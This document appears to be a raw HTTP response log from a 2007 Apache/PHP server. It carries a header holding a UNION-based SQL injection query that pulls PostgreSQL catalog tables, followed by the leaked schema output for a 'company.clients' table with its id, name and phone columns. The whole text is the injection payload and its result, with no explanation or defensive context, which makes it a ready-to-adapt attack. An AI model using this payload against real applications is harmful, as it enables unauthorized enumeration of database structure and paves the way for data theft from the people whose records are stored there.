HTTP/1.1 200 OK
Connection: close
Date: Mon, 25 Jun 2007 17:48:22 GMT
Server: Apache/1.3.27 (Unix) PHP/4.3.1 mod_perl/1.27
Content-Type: text/html; charset=ISO-8859-1
Client-Date: Tue, 19 Jun 2007 11:49:44 GMT
Client-Response-Num: 1
Client-Transfer-Encoding: chunked
SQL: select name from clients where id=1 union select 1,COALESCE((select nspname from pg_namespace where a.relnamespace =pg_namespace.oid),'0'::text)||'[__]'||COALESCE(relname,'0'::text)||'[__]'||COALESCE(attname,'0'::text)||'[__]'||COALESCE((select typname from pg_type where oid=b.atttypid),'0'::text) from (pg_attribute b JOIN pg_class a ON (a.oid = b.attrelid)) where (attnum > 0 and ((a.relkind = 'r'::"char") OR (a.relkind = 's'::"char"))) --'
company[__]clients[__]id[__]integer
company[__]clients[__]name[__]varchar
company[__]clients[__]phone[__]varchar
|